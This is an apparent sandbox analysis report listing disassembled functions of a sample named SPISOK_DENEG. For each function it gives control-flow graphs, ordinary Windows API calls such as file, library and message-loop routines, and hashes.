                                                            • Opcode ID: de5efcc5fb6160e4493fa49df371f09f5c4e02d4de68af46be8984e80e10ee27
                                                            • Instruction ID: c8f688b8c333ab27f413860a7f9b57f6b4418313b0700d90f434f7810f40ac2a
                                                            • Opcode Fuzzy Hash: de5efcc5fb6160e4493fa49df371f09f5c4e02d4de68af46be8984e80e10ee27
                                                            • Instruction Fuzzy Hash: F851C2711083C0AEEB709B26DD44BABBBE5EF41744F04041FF9C5A71A2EBB18985CB52
                                                            Function 000FA95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 910 fa95b-fa974 911 fa98a-fa98f 910->911 912 fa976-fa986 call fef4c 910->912 913 fa99c-fa9c0 MultiByteToWideChar 911->913 914 fa991-fa999 911->914 912->911 919 fa988 912->919 916 fa9c6-fa9d2 913->916 917 fab53-fab66 call efbbc 913->917 914->913 920 faa26 916->920 921 fa9d4-fa9e5 916->921 919->911 923 faa28-faa2a 920->923 924 fa9e7-fa9f6 call 102010 921->924 925 faa04-faa15 call f8e06 921->925 927 fab48 923->927 928 faa30-faa43 MultiByteToWideChar 923->928 924->927 937 fa9fc-faa02 924->937 925->927 938 faa1b 925->938 932 fab4a-fab51 call fabc3 927->932 928->927 931 faa49-faa5b call faf6c 928->931 939 faa60-faa64 931->939 932->917 941 faa21-faa24 937->941 938->941 939->927 942 faa6a-faa71 939->942 941->923 943 faaab-faab7 942->943 944 faa73-faa78 942->944 946 faab9-faaca 943->946 947 fab03 943->947 944->932 945 faa7e-faa80 944->945 945->927 948 faa86-faaa0 call faf6c 945->948 950 faacc-faadb call 102010 946->950 951 faae5-faaf6 call f8e06 946->951 949 fab05-fab07 947->949 948->932 965 faaa6 948->965 954 fab09-fab22 call faf6c 949->954 955 fab41-fab47 call fabc3 949->955 950->955 963 faadd-faae3 950->963 951->955 964 faaf8 951->964 954->955 968 fab24-fab2b 954->968 955->927 967 faafe-fab01 963->967 964->967 965->927 967->949 969 fab2d-fab2e 968->969 970 fab67-fab6d 968->970 971 fab2f-fab3f WideCharToMultiByte 969->971 970->971 971->955 972 fab6f-fab76 call fabc3 971->972 972->932
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,000F5695,000F5695,?,?,?,000FABAC,00000001,00000001,2DE85006), ref: 000FA9B5
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,000FABAC,00000001,00000001,2DE85006,?,?,?), ref: 000FAA3B
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 000FAB35
                                                            • __freea.LIBCMT ref: 000FAB42
                                                              • Part of subcall function 000F8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,000FCA2C,00000000,?,000F6CBE,?,00000008,?,000F91E0,?,?,?), ref: 000F8E38
                                                            • __freea.LIBCMT ref: 000FAB4B
                                                            • __freea.LIBCMT ref: 000FAB70
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1414292761-0
                                                            • Opcode ID: 859241e131600dc3f66fb794307f4b10c3fb84527f1de351db40086d99c5d000
                                                            • Instruction ID: 8a842ff686057d1ecb73e9dbe7e7a2acd76c325d5715676367ddcb0806643a40
                                                            • Opcode Fuzzy Hash: 859241e131600dc3f66fb794307f4b10c3fb84527f1de351db40086d99c5d000
                                                            • Instruction Fuzzy Hash: 7051D3B271021AAFDB258F64CC41EBFB7EAEB46710F154628FE08D6542DB74DC40E692
                                                            Function 000F3B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 975 f3b72-f3b7c 976 f3bee-f3bf1 975->976 977 f3b7e-f3b8c 976->977 978 f3bf3 976->978 980 f3b8e-f3b91 977->980 981 f3b95-f3bb1 LoadLibraryExW 977->981 979 f3bf5-f3bf9 978->979 982 f3c09-f3c0b 980->982 983 f3b93 980->983 984 f3bfa-f3c00 981->984 985 f3bb3-f3bbc GetLastError 981->985 982->979 987 f3beb 983->987 984->982 986 f3c02-f3c03 FreeLibrary 984->986 988 f3bbe-f3bd3 call f6088 985->988 989 f3be6-f3be9 985->989 986->982 987->976 988->989 992 f3bd5-f3be4 LoadLibraryExW 988->992 989->987 992->984 992->989
                                                            APIs
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,000F3C35,?,?,00132088,00000000,?,000F3D60,00000004,InitializeCriticalSectionEx,00106394,InitializeCriticalSectionEx,00000000), ref: 000F3C03
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID: api-ms-
                                                            • API String ID: 3664257935-2084034818
                                                            • Opcode ID: 523c1caa7d2cfbe7766319ade48a99504d618e9393013b23ccb1c1b4685ec91f
                                                            • Instruction ID: 7eeef5fdf96dd615913317ba964a44c020c656a6c3457d6230bf4c965ca597b8
                                                            • Opcode Fuzzy Hash: 523c1caa7d2cfbe7766319ade48a99504d618e9393013b23ccb1c1b4685ec91f
                                                            • Instruction Fuzzy Hash: 76110A31A05228ABCB318B689C51BAD77E49F01770F210110FB55FBA90D770EF4096D0
                                                            Function 000D98E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 993 d98e0-d9901 call eec50 996 d990c 993->996 997 d9903-d9906 993->997 998 d990e-d991f 996->998 997->996 999 d9908-d990a 997->999 1000 d9927-d9931 998->1000 1001 d9921 998->1001 999->998 1002 d9936-d9943 call d6edb 1000->1002 1003 d9933 1000->1003 1001->1000 1006 d994b-d996a CreateFileW 1002->1006 1007 d9945 1002->1007 1003->1002 1008 d996c-d998e GetLastError call dbb03 1006->1008 1009 d99bb-d99bf 1006->1009 1007->1006 1013 d99c8-d99cd 1008->1013 1018 d9990-d99b3 CreateFileW GetLastError 1008->1018 1011 d99c3-d99c6 1009->1011 1012 d99d9-d99de 1011->1012 1011->1013 1016 d99ff-d9a10 1012->1016 1017 d99e0-d99e3 1012->1017 1013->1012 1015 d99cf 1013->1015 1015->1012 1020 d9a2e-d9a39 1016->1020 1021 d9a12-d9a2a call e0602 1016->1021 1017->1016 1019 d99e5-d99f9 SetFileTime 1017->1019 1018->1011 1022 d99b5-d99b9 1018->1022 1019->1016 1021->1020 1022->1011
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,000D7760,?,00000005,?,00000011), ref: 000D995F
                                                            • GetLastError.KERNEL32(?,?,000D7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000D996C
                                                            • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,000D7760,?,00000005,?), ref: 000D99A2
                                                            • GetLastError.KERNEL32(?,?,000D7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000D99AA
                                                            • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,000D7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000D99F9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast$Time
                                                            • String ID:
                                                            • API String ID: 1999340476-0
                                                            • Opcode ID: ca4004d9684ae1c752cbd21686c438027bdf3f7b9062754bf10e21e1081654ec
                                                            • Instruction ID: 486814f08d679aa75712737f5380f6cf0c2ffacddf0e3fcd7fbf0a7d9f6b1b1f
                                                            • Opcode Fuzzy Hash: ca4004d9684ae1c752cbd21686c438027bdf3f7b9062754bf10e21e1081654ec
                                                            • Instruction Fuzzy Hash: 913104305447456FE7309F28CC46BDAFBD8BB04320F200B1AF9E5962D1D7B4A985CBA5
                                                            Function 000EB568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1052 eb568-eb581 PeekMessageW 1053 eb5bc-eb5be 1052->1053 1054 eb583-eb597 GetMessageW 1052->1054 1055 eb5a8-eb5b6 TranslateMessage DispatchMessageW 1054->1055 1056 eb599-eb5a6 IsDialogMessageW 1054->1056 1055->1053 1056->1053 1056->1055
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000EB579
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000EB58A
                                                            • IsDialogMessageW.USER32(00010480,?), ref: 000EB59E
                                                            • TranslateMessage.USER32(?), ref: 000EB5AC
                                                            • DispatchMessageW.USER32(?), ref: 000EB5B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 1266772231-0
                                                            • Opcode ID: ec8f10285a2bd694f990a87839b406c52a5df0d8b3c8f3d24bbc34ab598fb44a
                                                            • Instruction ID: 151bcfcb531b2a29da996328cf10c56b6b6b547cbcd3c697a15a93fb41cf0674
                                                            • Opcode Fuzzy Hash: ec8f10285a2bd694f990a87839b406c52a5df0d8b3c8f3d24bbc34ab598fb44a
                                                            • Instruction Fuzzy Hash: C7F0D072A0115AABCB249BE6DC4CEDF7FBCEF053917004415B915E2410EB34D645CBB4
                                                            Function 000EABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1057 eabab-eabca GetClassNameW 1058 eabcc-eabe1 call e1fbb 1057->1058 1059 eabf2-eabf4 1057->1059 1064 eabe3-eabef FindWindowExW 1058->1064 1065 eabf1 1058->1065 1061 eabff-eac01 1059->1061 1062 eabf6-eabf9 SHAutoComplete 1059->1062 1062->1061 1064->1065 1065->1059
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000050), ref: 000EABC2
                                                            • SHAutoComplete.SHLWAPI(?,00000010), ref: 000EABF9
                                                              • Part of subcall function 000E1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,000DC116,00000000,.exe,?,?,00000800,?,?,?,000E8E3C), ref: 000E1FD1
                                                            • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 000EABE9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                            • String ID: EDIT
                                                            • API String ID: 4243998846-3080729518
                                                            • Opcode ID: 6d09b85f9d4eae65d46537d2cf7238fe5de1707d6eead0ea5c6de87d3de8a34a
                                                            • Instruction ID: c8b8b070ad1dfb7f5c2c8fa3f94d97c126c18462ec32d2fed63b94263f27d0fb
                                                            • Opcode Fuzzy Hash: 6d09b85f9d4eae65d46537d2cf7238fe5de1707d6eead0ea5c6de87d3de8a34a
                                                            • Instruction Fuzzy Hash: 8BF0A7367006687FDB2057259C49FDB76AC9F47B41F484021BA05F31C1DB60EE8185FA
                                                            Function 000EAC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34comCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1066 eac16-eac7b call e081b OleInitialize GdiplusStartup SHGetMalloc
                                                            APIs
                                                              • Part of subcall function 000E081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000E0836
                                                              • Part of subcall function 000E081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,000DF2D8,Crypt32.dll,00000000,000DF35C,?,?,000DF33E,?,?,?), ref: 000E0858
                                                            • OleInitialize.OLE32(00000000), ref: 000EAC2F
                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 000EAC66
                                                            • SHGetMalloc.SHELL32(00118438), ref: 000EAC70
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                            • String ID: riched20.dll
                                                            • API String ID: 3498096277-3360196438
                                                            • Opcode ID: 17ec9903af708e6e89244e0de85710c7c32951920636ab35763444428a8ad2ce
                                                            • Instruction ID: bdd4e1e9862badb7b84b4a679c68cc2c48f887a91b97f0b75f0887f98ee86a2d
                                                            • Opcode Fuzzy Hash: 17ec9903af708e6e89244e0de85710c7c32951920636ab35763444428a8ad2ce
                                                            • Instruction Fuzzy Hash: 09F0F9B1900249ABCB10AFAAD9499EFFBFCEF84700F00415AA955E2251DBB456858BA1
                                                            Function 000EDBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1070 edbde-edc12 call eec50 SetEnvironmentVariableW call e0371 1075 edc36-edc38 1070->1075 1076 edc14-edc18 1070->1076 1077 edc21-edc28 call e048d 1076->1077 1080 edc1a-edc20 1077->1080 1081 edc2a-edc30 SetEnvironmentVariableW 1077->1081 1080->1077 1081->1075
                                                            APIs
                                                            • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 000EDBF4
                                                            • SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 000EDC30
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentVariable
                                                            • String ID: sfxcmd$sfxpar
                                                            • API String ID: 1431749950-3493335439
                                                            • Opcode ID: 7e3ecd657cb327543fe6b29af9c87c33048d8833873da9551468cb1008076868
                                                            • Instruction ID: 740ae1f83615e417f253c584e108e99fb8cddefcdca81359ac8350c63c26764e
                                                            • Opcode Fuzzy Hash: 7e3ecd657cb327543fe6b29af9c87c33048d8833873da9551468cb1008076868
                                                            • Instruction Fuzzy Hash: 87F0A7B2405265AECB202B968C06BEB3B9CEF08781B140452BDC5B5092D6F08980DAB0
                                                            Function 000D9785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1082 d9785-d9791 1083 d979e-d97b5 ReadFile 1082->1083 1084 d9793-d979b GetStdHandle 1082->1084 1085 d97b7-d97c0 call d98bc 1083->1085 1086 d9811 1083->1086 1084->1083 1090 d97d9-d97dd 1085->1090 1091 d97c2-d97ca 1085->1091 1088 d9814-d9817 1086->1088 1092 d97df-d97e8 GetLastError 1090->1092 1093 d97ee-d97f2 1090->1093 1091->1090 1094 d97cc 1091->1094 1092->1093 1095 d97ea-d97ec 1092->1095 1096 d980c-d980f 1093->1096 1097 d97f4-d97fc 1093->1097 1098 d97cd-d97d7 call d9785 1094->1098 1095->1088 1096->1088 1097->1096 1100 d97fe-d9807 GetLastError 1097->1100 1098->1088 1100->1096 1102 d9809-d980a 1100->1102 1102->1098
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 000D9795
                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 000D97AD
                                                            • GetLastError.KERNEL32 ref: 000D97DF
                                                            • GetLastError.KERNEL32 ref: 000D97FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$FileHandleRead
                                                            • String ID:
                                                            • API String ID: 2244327787-0
                                                            • Opcode ID: 627053b7bb222d22930b9e97c3f62c3f1dc12666f91b225853d4dac24e7f4ebe
                                                            • Instruction ID: 08be0df672447f8861a0de4b8c45ef8e8e1724f9339f23b6fb18df8c4801d2c7
                                                            • Opcode Fuzzy Hash: 627053b7bb222d22930b9e97c3f62c3f1dc12666f91b225853d4dac24e7f4ebe
                                                            • Instruction Fuzzy Hash: 24118230914304EBDF705F65C80466D77E9FB42721F10852BF86695790DB749E84EB71
                                                            Function 000FAD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,000F3F73,00000000,00000000,?,000FACDB,000F3F73,00000000,00000000,00000000,?,000FAED8,00000006,FlsSetValue), ref: 000FAD66
                                                            • GetLastError.KERNEL32(?,000FACDB,000F3F73,00000000,00000000,00000000,?,000FAED8,00000006,FlsSetValue,00107970,FlsSetValue,00000000,00000364,?,000F98B7), ref: 000FAD72
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,000FACDB,000F3F73,00000000,00000000,00000000,?,000FAED8,00000006,FlsSetValue,00107970,FlsSetValue,00000000), ref: 000FAD80
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID:
                                                            • API String ID: 3177248105-0
                                                            • Opcode ID: c1fbd42bd2e3b822ab4fe4e095e61665596b7bb58e42912ccf087ef2493be80a
                                                            • Instruction ID: b1795003e7f308478977c1edac934eb142d7164668c74eda344e0f0881e669cd
                                                            • Opcode Fuzzy Hash: c1fbd42bd2e3b822ab4fe4e095e61665596b7bb58e42912ccf087ef2493be80a
                                                            • Instruction Fuzzy Hash: F701477671122AABC7314B689C44A6B7B9CEF067A27100220FA5BD3D51C724D84196E1
                                                            Function 000D9F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F5,?,?,?,?,000DD343,00000001,?,?,?,00000000,000E551D,?,?,?), ref: 000D9F9E
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,000E551D,?,?,?,?,?,000E4FC7,?), ref: 000D9FE5
                                                            • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,000DD343,00000001,?,?), ref: 000DA011
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: FileWrite$Handle
                                                            • String ID:
                                                            • API String ID: 4209713984-0
                                                            • Opcode ID: fea197bbcfb2174e304acfc5eee00890bf5613f0f6f56779e5ee2df5717a28a7
                                                            • Instruction ID: 12765d1a135d28d7cf152de1ea4ba1e4907f0e82c586547e17c4482d45def614
                                                            • Opcode Fuzzy Hash: fea197bbcfb2174e304acfc5eee00890bf5613f0f6f56779e5ee2df5717a28a7
                                                            • Instruction Fuzzy Hash: 1831A271244305AFDB14CF20D808BAE7BA9FF85715F04452AF58597390CB759D88CBB2
                                                            Function 000DA2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000DC27E: _wcslen.LIBCMT ref: 000DC284
                                                            • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,000DA175,?,00000001,00000000,?,?), ref: 000DA2D9
                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,000DA175,?,00000001,00000000,?,?), ref: 000DA30C
                                                            • GetLastError.KERNEL32(?,?,?,?,000DA175,?,00000001,00000000,?,?), ref: 000DA329
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$ErrorLast_wcslen
                                                            • String ID:
                                                            • API String ID: 2260680371-0
                                                            • Opcode ID: 260a11f51f42bcf1d35725e8d78a8ece72347899c6e9839f3fc93d2cd263fe9d
                                                            • Instruction ID: 2f4814bdc8ab96d1b7c118377828a6014e77c8476ccdb593647d852e4da04b8d
